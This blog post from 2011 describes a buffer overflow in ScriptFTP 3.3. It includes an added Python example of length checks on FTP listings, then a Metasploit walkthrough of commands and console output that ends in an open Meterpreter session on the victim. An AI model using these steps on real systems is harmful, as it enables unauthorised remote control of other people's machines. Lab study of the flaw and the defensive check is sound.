Sunday, 9 October 2011

AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability

Class: Boundary Condition Error
Remote: Yes
Local: No
Published: Sep 20 2011 12:00AM
Updated: Sep 30 2011 07:00AM
Credit: Tom Gregory
Vulnerable: AmmSoft ScriptFTP 3.3
Description: ScriptFTP is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. ScriptFTP 3.3 is vulnerable; other versions may also be affected.
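The advisory classes this as a boundary condition error: the client copies server-supplied data (here, the directory listing returned for a GETLIST, as the Metasploit output later in the post shows) without checking its length first. The following is an added example, not code from the original post, from AmmSoft or from the Metasploit module; it shows the check a defensive FTP client applies to listing data before storing it, rejecting any entry or total listing that exceeds a limit. The limits MAX_ENTRY_LEN and MAX_LISTING_BYTES and the sample listings are constructed for illustration and are not values taken from ScriptFTP.

```python
import io

MAX_ENTRY_LEN = 512          # assumed limit: longest directory entry the client accepts
MAX_LISTING_BYTES = 1 << 20  # assumed limit: cap on total bytes read from the data connection


class ListingError(ValueError):
    """Raised when server-supplied listing data violates a boundary limit."""


def read_listing(stream, max_entry_len=MAX_ENTRY_LEN, max_total=MAX_LISTING_BYTES):
    """Read a directory listing from a binary stream (e.g. the FTP data
    connection) and return its entries as a list of str.

    Each entry is checked against max_entry_len *before* it is stored and the
    running byte count against max_total, so an over-long entry from a
    malicious server is rejected instead of being copied into a fixed buffer.
    """
    entries = []
    total = 0
    buf = bytearray()
    while True:
        chunk = stream.read(4096)
        if not chunk:
            break
        total += len(chunk)
        if total > max_total:
            raise ListingError(f"listing exceeds {max_total} bytes")
        buf.extend(chunk)
        # Entries are CRLF-terminated (RFC 959); bare LF is tolerated too.
        while True:
            idx = buf.find(b"\n")
            if idx < 0:
                break
            line = bytes(buf[:idx]).rstrip(b"\r")
            del buf[: idx + 1]
            if len(line) > max_entry_len:
                raise ListingError(
                    f"entry of {len(line)} bytes exceeds limit {max_entry_len}")
            entries.append(line.decode("latin-1"))
        # A partial entry that is already too long is rejected without
        # waiting for its terminator, so the buffer itself stays bounded.
        if len(buf) > max_entry_len:
            raise ListingError(f"unterminated entry exceeds limit {max_entry_len}")
    if buf:  # final entry without a trailing newline; already length-checked above
        entries.append(bytes(buf).rstrip(b"\r").decode("latin-1"))
    return entries


def parse_listing(data: bytes, **limits):
    """Convenience wrapper: parse an in-memory listing with the same checks."""
    return read_listing(io.BytesIO(data), **limits)


def listing_is_safe(data: bytes, **limits) -> bool:
    """True if the listing passes every boundary check, False if it is rejected."""
    try:
        parse_listing(data, **limits)
        return True
    except ListingError:
        return False


# Constructed sample listings (not captured from any real server).
BENIGN_LISTING = (
    b"-rw-r--r--   1 ftp      ftp          1024 Sep 20 2011 readme.txt\r\n"
    b"drwxr-xr-x   2 ftp      ftp          4096 Sep 20 2011 pub\r\n"
)
# One entry padded to 2000 bytes of filename: the shape of input a
# client without boundary checks would copy straight into a fixed buffer.
OVERSIZED_LISTING = (
    b"-rw-r--r--   1 ftp      ftp          1024 Sep 20 2011 " + b"A" * 2000 + b"\r\n"
)

if __name__ == "__main__":
    print(parse_listing(BENIGN_LISTING))
    print("benign accepted:", listing_is_safe(BENIGN_LISTING))
    print("oversized accepted:", listing_is_safe(OVERSIZED_LISTING))
```

The point of the design is that the length test happens on the server's bytes before they reach any fixed-size storage; a client that copies first and checks afterwards (or never) is exactly what the advisory describes.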

To exploit this you can use either the Python or the Metasploit exploit; I prefer the Metasploit one because of the payloads. So the first thing you need to do is put the exploit under the folder /pentest/exploits/framework3/modules/exploits/windows (I called mine scriptftp33.rb); just paste the content of

Now, step by step:
1) msfconsole
2) use windows/ftp/scriptftp33 (to use the exploit that we just created)
3) set PAYLOAD windows/meterpreter/bind_tcp (to use Meterpreter as our payload)
4) set RHOST (this is the IP address of the server that I am attacking)
5) exploit

OK, now the attacking-server bit is ready to go. Next you need to download ScriptFTP from and install it.
Open ScriptFTP and create a script with the following content:

CLOSEHOST = the IP address of the attacking server.
ftptest = username
passwordtest = password
Remember to create this user on your attacking server.
Save it as exploit.ftp.
Now click Open and select exploit.ftp.
If everything goes all right, in your Metasploit console you should now see something like this:
msf exploit(scriptftp33) > [*] LOGIN ftptest / passwordtest
[*] - Data connection set up
[*] - Sending directory list via data connection
[*] Sending stage (752128 bytes) to
[*] Meterpreter session 1 opened ( -> at 2011-09-30 10:15:21


Right, now you have your Meterpreter session; just type "sessions -i 1" and you can do everything you want ;)

That's it guys.
